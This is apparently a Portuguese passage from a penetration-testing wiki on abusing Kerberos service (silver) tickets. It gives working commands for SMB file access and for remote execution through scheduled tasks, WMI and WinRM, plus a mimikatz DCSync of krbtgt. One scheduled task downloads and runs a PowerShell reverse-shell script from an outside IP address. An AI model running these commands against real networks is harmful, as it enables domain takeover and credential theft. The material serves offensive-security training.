HOST
RPCSS
| | PowerShell Remoting |HOST
HTTP
Dependendo do SO também:
WSMAN
RPCSS
| | WinRM |HOST
HTTP
Em algumas ocasiões você pode simplesmente pedir: WINRM
| | Tarefas Agendadas | HOST | | Compartilhamento de Arquivos do Windows, também psexec | CIFS | | Operações LDAP, incluindo DCSync | LDAP | | Ferramentas de Administração Remota de Servidores Windows |RPCSS
LDAP
CIFS
| | Golden Tickets | krbtgt | Usando **Rubeus** você pode **solicitar todos** esses tickets usando o parâmetro: * `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm` ## Abusando de Service tickets Nos seguintes exemplos vamos imaginar que o ticket é recuperado se passando pela conta do administrador. ### CIFS Com este ticket você poderá acessar as pastas `C$` e `ADMIN$` via **SMB** (se estiverem expostas) e copiar arquivos para uma parte do sistema de arquivos remoto apenas fazendo algo como: ```bash dir \\vulnerable.computer\C$ dir \\vulnerable.computer\ADMIN$ copy afile.txt \\vulnerable.computer\C$\Windows\Temp ``` Você também poderá obter um shell dentro do host ou executar comandos arbitrários usando **psexec**: {% content-ref url="../ntlm/psexec-and-winexec.md" %} [psexec-and-winexec.md](../ntlm/psexec-and-winexec.md) {% endcontent-ref %} ### HOST Com essa permissão, você pode gerar tarefas agendadas em computadores remotos e executar comandos arbitrários: ```bash #Check you have permissions to use schtasks over a remote server schtasks /S some.vuln.pc #Create scheduled task, first for exe execution, second for powershell reverse shell download schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe" schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'" #Check it was successfully created schtasks /query /S some.vuln.pc #Run created schtask now schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName" ``` ### HOST + RPCSS Com esses tickets você pode **executar WMI no sistema vítima**: ```bash #Check you have enough privileges Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local #Execute code Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand" #You can also use wmic wmic remote.computer.local list full /format:list ``` Encontre **mais informações sobre wmiexec** na seguinte página: {% content-ref url="../ntlm/wmicexec.md" %} [wmicexec.md](../ntlm/wmicexec.md) {% endcontent-ref %} ### HOST + WSMAN (WINRM) Com acesso winrm a um computador, você pode **acessá-lo** e até obter um PowerShell: ```bash New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC ``` Verifique a seguinte página para aprender **mais formas de conectar-se a um host remoto usando winrm**: {% content-ref url="../ntlm/winrm.md" %} [winrm.md](../ntlm/winrm.md) {% endcontent-ref %} {% hint style="warning" %} Observe que o **winrm deve estar ativo e ouvindo** no computador remoto para acessá-lo. {% endhint %} ### LDAP Com este privilégio, você pode extrair o banco de dados do DC usando **DCSync**: ``` mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt ``` **Saiba mais sobre DCSync** na página a seguir: {% content-ref url="dcsync.md" %} [dcsync.md](dcsync.md) {% endcontent-ref %} (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
Se você tem interesse em **carreira de hacking** e em hackear o inquebrável - **estamos contratando!** (_é necessário polonês fluente escrito e falado_).
{% embed url="https://www.stmcyber.com/careers" %}